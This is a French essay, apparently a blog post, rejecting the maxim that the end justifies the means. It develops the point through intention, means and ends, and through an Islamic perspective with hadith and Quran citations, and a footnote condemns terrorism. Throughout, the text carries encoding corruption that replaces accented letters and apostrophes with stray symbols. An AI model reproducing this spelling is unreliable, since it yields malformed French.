On entend parfois cet adage que tout le monde connaA�t A�A�la fin justifie les moyensA�A� [1] qu’on attribue souvent A� Machiavel pour la��absence de scrupules dans sa philosophie politique. La formule sous-entend que la personne qui adhA?re A� cette idA�e est prA?te A� tout pour atteindre ses objectifs, y compris les mA�thodes condamnables ou peu nobles, parfois mA?me inhumaines, qui la dA�grade elle-mA?me et autrui. J’abhorre cette idA�e. Je la rejette et la condamne. La fin ne justifie jamais les moyens. En tout cas, pas selon un mode de pensA�e qui se veut dA�fenseur de l’A�quitA� et de la justice.

Dans toute entreprise, on peut dA�finir trois A�lA�ments qui la constitue :

  1. la��intention (ou la motivation),
  2. les moyens (ou les actions) et
  3. la fin (ou l’objectif concret)

Ces 3 A�lA�ments se succA?dent systA�matiquement. Le rA�sultat est engendrA� par les actions qui sont elles-mA?mes engendrA�es par l’intention. Une entreprise vertueuse ne peut A?tre digne de ce nom que si ces trois A�lA�ments le sont indA�pendamment. Dans le cas contraire, on ne ferait que se voiler la face en se trouvant des justifications pour appuyer nos choix et les faire accepter aux autres et/ou pour se donner bonne conscience.

En effet, si l’intention est mauvaise, les actions ne seront que tromperie et l’objectif intA�ressA�. Par exemple, une personne dont l’intention est de nourrir son orgueil qui se comporte avec courtoisie avec les gens afin d’A?tre considA�rA�e comme quelqu’un de bien et qu’on le lui dise.
Si les actions sont mauvaises, nous sommes en pure contradiction avec l’intention qui prA�cA?de et le rA�sultat qui suit et souvent, le rA�sultat ne sera obtenu que de faA�on A�phA�mA?re. Par exemple, un pA?re dont l’intention est d’A�duquer son enfant grossier qui le fait taire en l’insultant A� son tour. C’est comme vouloir se nourrir pour A?tre en bonne santA� mais mettre sa nourriture dans un bol rempli de saletA�s et de maladies. Enfin si l’objectif est vil, nul besoin de dire que l’intention ne peut A?tre vertueuse et gA�nA�ralement, les actions seront du mA?me acabit.

DA�veloppons davantage le cas qui nous intA�resse ici, A� savoir le fait de recourir A� des moyens condamnables pour obtenir une fin qui peut A�ventuellement A?tre louable. Sur le plan personnel, il semble difficile de considA�rer qua��une telle chose na��engendre pas, au minimum, un cas de conscience. MA?me dans les cas les plus extrA?mes comme le fait de torturer pour obtenir des informations qui sauveront peut-A?tre da��autres vies. Da��une part, comment pouvoir dA�cider, en son A?me et conscience, qua��une vie au vaut moins qua��une autre, ou mA?me que 10 autres ? Na��est-ce pas lA� une porte ouverte A� toutes sortes de dA�rives, y compris la��eugA�nisme [2] ? A�a la��est, assurA�ment. Da��autre part, le tortionnaire ne vend-il pas son A?me au diable en consentant A� A?tre la��outil de telles pratiques ? Na��est-ce pas hypothA�quer son humanitA� pour un rA�sultat qui est plus qua��incertain ? Certainement. Et si cet exemple est extrA?me dans la forme, le fond de cette pensA�e reste valide quel que soit le moyen condamnable qui serait utilisA� pour atteindre une fin louable.

Sur le plan politique, il est tout aussi aisA� de comprendre les dA�rives possibles de la��adhA�sion A� ce que reprA�sente cet adage. La��absence de scrupules pour atteindre ses fins est encore plus grave et lourd de consA�quence lorsque les sujets des actions sont des dirigeants politiques. Des gens dont les dA�cisions, par dA�finition, ont des consA�quences sur un grand nombre de personnes et dont la responsabilitA� est donc proportionnelle A� leur influence. La fin justifie les moyens au sens politique est la porte ouverte aux dA�rives autoritaires et A� la dictature. En outre, cela engendrera le soupA�on permanent et donc la��absence de confiance, de vA�ritA�, vA�ritable fondement des relations humaines. Ca��est donc la vie sociale elle-mA?me qui est consumA�e par une telle idA�ologie qui est par ailleurs la��ennemie de la dA�mocratie. En effet, la dA�mocratie demande la��existence da��un mA�canisme permettant de dA�celer et de mettre A� jour les dA�rives du pouvoir.

Ce na��est pas pour rien que la��on attribue cet adage A� Machiavel et que la��on dA�finit un A?tre da��une grande perfidie, da��une scA�lA�ratesse tortueuse comme A�tant A�A�machiavA�liqueA�A� [3].

Une relecture de ceci avec une perspective plus religieuse est A�galement possible. Tout da��abord, en Islam, les actions ne valent que par leurs intentions :

Oumar ibn al-Khattab rapporte :
A� J’ai entendu l’EnvoyA� d’AllA?h dire : « Les actes ne valent que par les intentions et A� chacun selon son intention. Celui qui A�migre pour AllA?h et Son Messager, son A�migration lui sera comptA� comme A�tant pour AllA?h et Son Messager. Tandis que celui dont l’A�migration a pour but d’acquA�rir des biens de ce bas-monde ou d’A�pouser une femme, son A�migration ne sera comptA� que pour ce vers quoi il a A�migrA�. » A�
Hadith rapportA� par Al-Boukhari et Mouslim. [4]

Des passages du Coran nous montrent A�galement que sans la bonne intention qui prA�cA?de, les actions sont futiles :

En parlant des offrandes qua��on sacrifie A� Dieu : A�A�Ni leurs chairs ni leurs sangs n’atteindront Allah, mais ce qui L’atteint de votre part c’est la piA�tA�.A�A� [5]

A� Dis : « Que vous cachiez ce qui est dans vos poitrines ou bien vous le divulguiez, Allah le sait. Il connaA�t tout ce qui est dans les cieux et sur la terre. Et Allah est Omnipotent. A� [6]

Ce qui compte vraiment et qui incombe au croyant, c’est la��intention et la��effort. La��intention matA�rialisA�e par la sincA�ritA� dans la��ouvrage et la��effort matA�rialisA� par la��action concrA?te. Et en rA�alitA�, pour le croyant, A�a sa��arrA?te lA�. Le rA�sultat na��a pas da��importance en soi car il est crA�A� ou non par Allah, selon Sa volontA�. Le croyant qui agit par pure sincA�ritA� na��agit pas pour voir et profiter du rA�sultat, il agit par sens des responsabilitA�s, son intention est pure et la��action qua��il choisit en consA�quence est dA�sintA�ressA�e mais rA�flA�chie {1}. En effet, il sait qua��il a une obligation de moyens et non une obligation de rA�sultats. Ce qui signifie que Dieu va le juger non pas sur ce qua��il a matA�riellement obtenu comme rA�sultats mais sur la��effort qua��il a fourni pour y parvenir, et Allah connaA�t la��effort que chacun fournit. La��intention ayant un rA?le primordial puisque sans elle, les actions et donc les efforts sont vains. La��intention est comme un A�A�1A�A� qui vient se mettre devant les efforts et les actions qui sont comme des A�A�0A�A�, ils na��ont de corps et de valeur rA�elle que si le A�A�1A�A� les prA�cA?de. Six zA�ros consA�cutifs ne feront jamais que zA�ro globalement, tandis que la��intention en fera un million.

Par ailleurs, la prise de distance face au rA�sultat matA�riel apporte une dimension toute autre A� la��A�chec ou plus justement au manque de rA�sultat matA�riel. En effet, un A�chec en ce sens na��en est plus un. Le croyant ayant agit avec sincA�ritA� et ayant fait son possible matA�riellement sera rA�compensA� qua��il obtienne un rA�sultat matA�riel ou non. Le rA�sultat matA�riel devient alors un don de Dieu et non la rA�compense de la��effort puisque la��effort, sa��il est sincA?re, est pour Allah et sa rA�compense sera auprA?s de Lui.

Abou Hourayra a dit :
Le Messager de Dieu a dit : A� Dieu exaltA� ne regarde ni vos corps ni vos apparences, mais Il regarde vos cA�urs et vos actions. A�
Hadith rapportA� par Mouslim [7]


 

{1} Il est volontairement omis dans le corps de texte de faire mention d’actes terroristes perpA�trA�s soi-disant au nom de Dieu, il est A�vident que l’essence mA?me de cet article s’oppose A� de telles pratiques barbares. Pour lever toute possibilitA� d’ambiguA?tA� ou d’interprA�tation des propos vis-A�-vis de cette question, nous affirmons dans cette note que notre position A� ce sujet est purement et simplement qu’un musulman ne peut A?tre un terroriste et un terroriste ne peut A?tre un musulman. Si nous devions faire un lien avec le corps de texte de cet article, si les actes terroristes devaient se placer dans le cas d’un exemple de bonne intention avec une bonne fin, bien qu’il faille A?tre d’une bienveillance presque naA?ve pour ce faire, c’est sans aucun doute l’un des meilleurs exemples qui puisse A?tre donnA� d’une action en total dA�saccord avec l’intention et les objectifs. Si on peut leur laisser le bA�nA�fice du doute quant A� la sincA�ritA� dans leurs intentions (toujours dans une bienveillance naA?ve), il n’y a aucun doute sur le caractA?re inadmissible sous aucun prA�texte des actions ainsi que sur l’A�chec inA�vitable des objectifs.

[1] https://www.wikiwand.com/fr/La_fin_justifie_les_moyens
[2] https://www.wikiwand.com/fr/Eug%C3%A9nisme
[3] http://www.larousse.fr/dictionnaires/francais/machiav%C3%A9lique/48323
[4] Riyadh Salihin, Chap. 1, Hadith 1
[5] Coran 22/37
[6] Coran 3/29
[7] Riyadh Salihin, Chap. 1, Hadith 7

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